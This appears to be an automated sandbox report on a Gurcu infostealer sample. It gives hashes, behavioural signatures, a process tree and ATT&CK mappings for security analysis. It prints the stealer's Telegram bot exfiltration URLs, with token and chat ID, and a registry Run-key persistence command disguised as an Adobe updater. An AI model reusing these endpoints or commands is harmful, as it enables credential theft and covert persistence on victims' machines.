Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
08-12-2024 06:04
Static task
static1
Behavioral task
behavioral1
Sample
data.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
data.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
data.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
data.exe
Resource
win11-20241007-en
General
-
Target
data.exe
-
Size
5.6MB
-
MD5
d650ccbec4cef66b790c0adbd0c690ed
-
SHA1
7c5323641a28170edb3121d9ad15d7bf643d801d
-
SHA256
b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474
-
SHA512
332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535
-
SSDEEP
98304:6W1l27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:6jOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=2024893777
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation data.exe Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 1 IoCs
pid Process 3304 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 2764 data.exe 3304 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdater\\conhost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 10 raw.githubusercontent.com 11 raw.githubusercontent.com 20 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3380 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2636 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1756 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 2764 data.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe 3304 conhost.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2764 data.exe Token: SeDebugPrivilege 3380 tasklist.exe Token: SeDebugPrivilege 3304 conhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3304 conhost.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2764 wrote to memory of 3300 2764 data.exe 84 PID 2764 wrote to memory of 3300 2764 data.exe 84 PID 3300 wrote to memory of 2456 3300 cmd.exe 86 PID 3300 wrote to memory of 2456 3300 cmd.exe 86 PID 3300 wrote to memory of 3380 3300 cmd.exe 87 PID 3300 wrote to memory of 3380 3300 cmd.exe 87 PID 3300 wrote to memory of 4088 3300 cmd.exe 88 PID 3300 wrote to memory of 4088 3300 cmd.exe 88 PID 3300 wrote to memory of 2636 3300 cmd.exe 89 PID 3300 wrote to memory of 2636 3300 cmd.exe 89 PID 3300 wrote to memory of 3304 3300 cmd.exe 90 PID 3300 wrote to memory of 3304 3300 cmd.exe 90 PID 3304 wrote to memory of 4960 3304 conhost.exe 94 PID 3304 wrote to memory of 4960 3304 conhost.exe 94 PID 4960 wrote to memory of 1756 4960 cmd.exe 96 PID 4960 wrote to memory of 1756 4960 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\data.exe"C:\Users\Admin\AppData\Local\Temp\data.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp172D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp172D.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2456
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2764"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:4088
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:2636
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:1756
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
269B
MD590755c58f0beac41d9c3222bcef27ebd
SHA1d09642fa70d6caf052f2fbe91ffdb07246846761
SHA2567c94a9924120deaf30687567befa5a8eb92a60fb6315da9c78103d8d742692a3
SHA512480d525704529f9774c9bd67783b1ba13274f578ac4904e19bf380231025f0105afbac3c4bc30157895379c5b005bd0564ce55a40678d08736a8e85d94000e66
-
Filesize
5.6MB
MD5d650ccbec4cef66b790c0adbd0c690ed
SHA17c5323641a28170edb3121d9ad15d7bf643d801d
SHA256b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474
SHA512332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535
-
Filesize
439KB
MD53928432bb9dd7e6b32b4154f339fd86f
SHA1de2d735763557c291a70db78448b620a2ae9eaf3
SHA25604df2dd4825e1570bc424de85f350b5b69a8bf186e3f55521cba0e9cf4f2841d
SHA5121376dce4bdb1cfa4cf0df804e62f416411b232a7ec660ab4fbb973e5646afaaf508d4baf803e864d34267c5b387a8a9b97d669977674c4e6aecfa13f8056e06c
-
Filesize
452KB
MD58b4ed80e17fd6179a47ee1ab67c40572
SHA18f59d111c97f6f81e006b84cba66cd54916f8301
SHA25698bb828e6da0c2cebf77740ff46e0a6f02342b7eea7fa01a6886f4a3c8878e97
SHA5128de67e4d7c602ae1fabcf0c1a579b038d3ae70e6234313920ced7bfbdd498ca6ed09c9c296e1b6046f1d9617674cc4b62b427b1b22f0348bc5028fd02efdf286
-
Filesize
412KB
MD5c1ead3622fad7694865785bc62a720d2
SHA133e3515fd52fb707de74225dd95a28af99bfe9fe
SHA256fb0949fb16f77ba5db661008aaa866267512708c7fdfe3aa98eb75434792b518
SHA512a5a525eb1f2de6662efdcfa3d370ed115f63afc3eb798344189648706c24f17b3baa1015feaafcb81c98cfc721d48c282fa7c29e63dd3aebe9e979f972ac4c68
-
Filesize
334KB
MD5d91784fd1ffa81462e0a018c8c50bc45
SHA14c68ae693c09e8dcf298643b773aada1e9015bf1
SHA25656984adc96e6fb8730da45bd64d46d65b3ff34bf42aff98f7883a047f4d7f7ec
SHA512629316541dd946dc56c70291dcd39dc80d7155feba1041a16b58e6fb211480eded8dfb431a7eed2f8590d6ae042a5f8a1e8d72972d5b2155dbfa609f9b83c36c
-
Filesize
465KB
MD583c8546565cf15ca4807c7cfce96a38c
SHA1ab9c28f5bd99a69c23810f2a5eea2df3d0422f91
SHA256675860cf4e79033dc24bfbd0e48962eff165cc6d7dbdbbe4ef48c9f402baeb18
SHA512e83735686a3318209a76f3493449337b9bfa1d31c055589a5fb94c12327294afb7707722a5db5a6e44dd806e22e5b73879e15e9a665c46612d2ebbb9a51c5de0
-
Filesize
176KB
MD58044acc485af6cf031dc30e178adb48d
SHA1c6aa54a46e051a6c8ac74363777af1b3fa51fb5a
SHA256870ee5049040bfbe0e450ae5656cb5f7115063128781bcaa1dfbaf7712823b01
SHA512440cda3ef221f62d3d298a0da14638370974c297659334dd4eb16e34c824da24a6ebd9438aca02d43ab90c1c5a559c1cc5991528234d63dd031c1c3a29667665
-
Filesize
281KB
MD5a237be1e573097d5cc26dcbb9fcef963
SHA107b780e1a0a39a82cd5e494c767e88ef72a61a50
SHA256f6a3c6ceacdbaa3d53a4a07c6b3261877835a0682e80b1cbc1247d977b637a8c
SHA512c1952bc4beab566219416311d1bb6b2e3dfe1bb6a599cec77cb1f133dcabdd7ee960d3cd99cd1ed5c4eda9d53055af31b4411ea0f78841a76efe16a48625c6f7
-
Filesize
21KB
MD576243adafab40f7d42b762435b910e21
SHA189a7330017619ccea85721b35940daae67d4e03f
SHA256ce096fb95cf426b9fb020e6317c46d4032f2d8e46735f311d7adbb0605d7290d
SHA51287ae69ee6e6123c9768433b4e6b412b7f7770ff09437bb81b6a61f4ebfc39c13daa8c4a6c1228dee356a8b8baa54f52bee1fcf597fbffe88d92b0d53e0c58772
-
Filesize
190KB
MD50e6da848605b8887201550208f16851f
SHA17194a0a84eefd21b3f1c7d9429660df5dfe8b62d
SHA256b0ef0f7a59cc62ef6d1e85897c6bd9d9a6e2066ffa003761a278a31c2d6434fe
SHA5121085b237a20cc1235a177b22146ded0dff8e57a8209611d4bedc4e1159d7c8bba73c9e352f92fdd9044e7ef8de143722aea2a52cde56a9bb41a9e3dc5d96f5bb
-
Filesize
216KB
MD5aab62ce4c4bd2150f42138869af7e250
SHA1f208110ad25f949c49309f23a1b83983d9385f11
SHA256b3bb3bc3f0de7487c504e0abe3204ec70b7f6eafb97ffa266790b36cf967faf7
SHA512a4f2a2691b6cc32deea166aa944d775e1bb8112ee6c6e2b9dacee17943469b0a851b5194e1ec24fb337067c7c53b8e138a5b0f931d16dd87c7d8dfcde759c979
-
Filesize
203KB
MD5053d5a302e684f164d88688e69f4185e
SHA106a8a341ac7f838ad22b5250278903ec45c125c7
SHA256f56b066d6d59449d197e124f068a741b3f0bc59bd2eb5e79c8172771327ba2b4
SHA512ea39e7ad92afc70f3351337c5d65fa96c8ea5e5368fdccab975cd007196a2c8c3e1c78a9324b4435dbf79a8e8266ab4986fcb48394d1ec1450b6318e57eae1e5
-
Filesize
642KB
MD5c49babd06c90227747c811ed7a92654f
SHA173c484c8ecf208d3bf23cc32075992f65af13736
SHA2562fcf9be418a1278ad36ca7209f80c065acf724639f1675b0a7269435a1005e7d
SHA5129a9217391284fb53e2a1caf04401eec1690832f74b171eb092af36dfbc5f2727ba1891e272317291fa087cf9f56b7aca550f8f2ca5c4681b7caed8ad11312be2
-
Filesize
399KB
MD522646d63078cc3c065bb014059160792
SHA1f72fbd250e09da47aed81d2b0565d4cf79cf7c18
SHA256607603d1d97c04ee0073c48ef016b5d0dd9775ffecc3d9a72f1f79e00fdca254
SHA512e090cb19e7aca3c6747107250729ba55db009e9cd27e528ad2151f1796a3bacee1ea07228041b54e4a3f666624acb033e2cc570a2f808cb67cc903f83cf4fb13
-
Filesize
373KB
MD5ed1df29114245cb4753c32fb2fd09e76
SHA1a19c846bf91bf46bf7528523990cd3cf89732c03
SHA256891ecc5cfdcfa5a612fb11aebd2b538310bea1202306559c2d93af0491e4b3c8
SHA5120b8279348790c4996f082afff88506ab9153c900740252f800017b602e6cd1f657964a17c402460145d7e4e042cbdb1ed7ba23d4d386a572e319301479731e68
-
Filesize
229KB
MD5ee19dfd0f504dbbf2132252dbab33dde
SHA17b2693e0bbaf30b47edce3f719c481c2e18754b8
SHA256a259d83f8c2dfe60130a2b0c9e91edf1c3d3854df4a729136699e7d3ac48f65d
SHA51203f73dc550db54e28271c0ca63f92a7f9f3a3c4c52e33abfc58f6bc508099f71d250ead4e14ece5238e2a5ab58f4f2696954602ea70524bf248deb1bcdb40624
-
Filesize
255KB
MD59fc246c63521a419b5c50f9952d00372
SHA11e391d9de17d5eb7382f8ca45afd95ccc39d8661
SHA256e59fbc99973afd91a2c8c8cb72335387c33688b93de14bbd9a8479110acbd271
SHA512788367f92748d8ed6f412afa4da1ecb98a93200345ff9386ecf3f9a7b12dbeb0b3876b661aeecb67edc8e08949d9ab0149bc44a6fb79b8f2eb65a62730082641
-
Filesize
308KB
MD5f84c71a32b6783663addeda27e19215b
SHA11715058925f68d68101a48740715d494e228a72c
SHA256a038202a6ff2e409559e2167ced5526b3d5350cc25123cf90e3e1d9333bb3ef7
SHA512c4d7301ba9538059effb25680614f4cdc947da38212ffa25927cae85e048da2d059b099c766874920cd52f4ce6d0499bd35b7eee0976966c791520ac8ad850a5
-
Filesize
425KB
MD5d857cbab0ef8b2ed04ac7828630232a9
SHA1b496629d1fec0de0cc9e8095d7021f61b14fcc69
SHA2565c98d94dfdeedd674f48b5b354e86c7ae777d0450aca894d3f2b31bd32b64d1b
SHA5125b68a397a1a3db45dda79c2052f75a4ade295fb2886ea2ff58489d4f66235cab1713c5708ccd09b6858df4bc42e4b9d820e9beff638ab05d25ede4dd73399f96
-
Filesize
242KB
MD50db6af831ef81486e44e4997c9865df5
SHA147faf0cbaddfea325c9833ebcc6c19a163faa78b
SHA2567e46ad9a58e313a89df0f2bf0a0936cfc2f234fe1a911db8fd0fbdcfbe1f6dd8
SHA5123b2335613ef3a53b6940b1a442c85c30298d6a8a085a943f767e46b2967737b08817c91b77c3a382f83dc18de4d7bf68b33d6ac43024d44d1fc8e114f889c804
-
Filesize
12KB
MD5fe246fe0b9020ad100782ee059f96070
SHA1762db2be66aebfd2fdb6018a8b15e807a6477701
SHA2562d707afd10e449832e040e7b484d249c82a1346204d95ef4135acaea5fcea01e
SHA51207edbf818d17b470d73fdb0c6606df0b710f3374b26d80edc789342c6ba75c64ededd772328cfc16685da4041bfd7820939471697f0bfad9cf8b491cd6eccc6e
-
Filesize
321KB
MD551c6cf87f492cb05d01c45866df0b739
SHA1d97523464e871dc3dc1744c69ac0d8e20bc9cda8
SHA2567bfbc86485afed746a61a07a1bcf9a293953346a05617f0d42cd573068742d5b
SHA512813800ddae68918e1d88b1acd6316be8f9e0de96f546f415fec2dbfb26e8df7e6039498c78048bb8f4f0936b576e99d0dc5647f4a99f04b85d1567af056b64b0
-
Filesize
163KB
MD5b65f33bb8f4635c579f082d194db85b2
SHA11c719e951d7b9a08a71024aa7b5a97b80e6063ea
SHA2568b7335b9ff705591e8de692d83e93db7e02cdbc97529b51d21fa0b30cc72e7b9
SHA5129f063b5f6671d9d2a39f7098db44e5c4c48214742c1077c906f958e238896a9385837412f5c18807ca420fb848ccd94054b21450f3f81c6740d407115edca454
-
Filesize
268KB
MD5a24d1defe97a761e7f3a648879dbfc50
SHA12122e6c58e692fd4e9656764c338a9134fa6611a
SHA25685135ca72a4fceb0404060ff047a00902d0480e2e4194cdbf1efb06e7f129535
SHA51245d459a7c08eb80a33a1ffa39f77621a397bcca4716d59dbd4c84bce78d117fa21268763a7b219a0748522f8d3469b44834cc01235e3a4deb3fff75a7ab3293e
-
Filesize
347KB
MD5b9bdc0df41bf40733df0b884c695ff59
SHA127685e595a958495b503ff56698e7b2c19bea0b9
SHA256a430d24b037959b98c764e54ae969f0f9ae1fb99ec0dfbec7ad4870cab63bcef
SHA512cc1abc754d52308fc2434a08affcca94936d27890efd3a33ced8211a775e4456751e6565e063a840a9ba40c154e3011cf4b201fcae282f5e0b81f94845d01e36
-
Filesize
360KB
MD5aa2da18f2fab58b6348ad4bdd2e11260
SHA12559ea4dbf40e30d7b7a8ecdeaeed945c47ba226
SHA256001a1762ed7db22b45698a10aa0faa19db3375929513d44d1883c81cb920bc64
SHA5120d58037dd21afe2c7fd5bcaf3f28cc96156efbc396237b944fa13003674182c69cc415b0784e653bbceeddf3070e73d532b5fe97a21b8fbb7067c218ebfb2a42
-
Filesize
386KB
MD5fbf7ffc8383aff65ebc87291aeab9b29
SHA13bea01f62d72d42a83c060d6604bf260f3fd0673
SHA25607c3392ff72bf73028eeaebdfb63ca454a7d6fe59c86fdd0e790845d8ba5cd5f
SHA512b711f4a4e883771217e348d55a2a3edefc58b7950d7883cdf2e58d94159ecb39dba98648588fba034f915ec9cedc3b05323fd6d7a625b09babccd265eab8a6dc
-
Filesize
294KB
MD553a78cdba3aa914c0ffb736bd6bd95d8
SHA1b22907cb1fe4d3d31f96ed3cac68e19135bc539c
SHA2568a72135e1258743c78a4b00601b646c18229411ddbc05d01eb464a7069adab3c
SHA512765fc30f756e3b4724a475d5492edd45a47c0810f293d034be705773eea084a7b75cebbfca6c3f839118f5751b18e3a7a734954c49bf2c468b128b1066eaf834
-
Filesize
1000B
MD556b8a8b4d7b5166a3bd9335a4e989297
SHA15b85908c79ff9cd66cb0a6f59f4e96fe7b8be445
SHA256f3afa7c541cffc83c23d0122f7c36f139a620dbbcdecae339fed4e9ddf5b00a8
SHA512bd8cf5e4166568cf28f99ec794fe48d0ec0b24dca243c0e320c63fc4f653cb9ea6b512f983fcef0f990b29160ae0e61cb3b6e60a63a5fa7890cd6f6bd25e94f9
-
Filesize
2KB
MD5b3772990dde45194647038d9f0801607
SHA131fb13e40954a93038504bb1d6c71f751eeacbb1
SHA256c3af2716bd6e46f38e61e13abddcefde52d3166106216d98af5ccbd3c6d57cdc
SHA5122fe9b09efe69ff2b230d53fcf57dcde20d0370643265d293f8b6028571bed3492a6bc6669c3068e9aea8f6df94fb3c9c7132d7e97f1f7083076f736dc0dadbd1
-
Filesize
923B
MD59c0bfb28fe4eb8edbb56e55b7e7eae8e
SHA138d6ac2c82bb2356382736493ed7d066cba6ea65
SHA25641285ee304e70327a8a054660b4b6e381dde943a96059a45addc701df18d1819
SHA512e05c5f6037c3d579902f9641d05b84bd88ce654d6171200e222e21d0e51c8b93756c319a67ea9d660294017da3e89047698a9c401055800b88763907ee0d28e6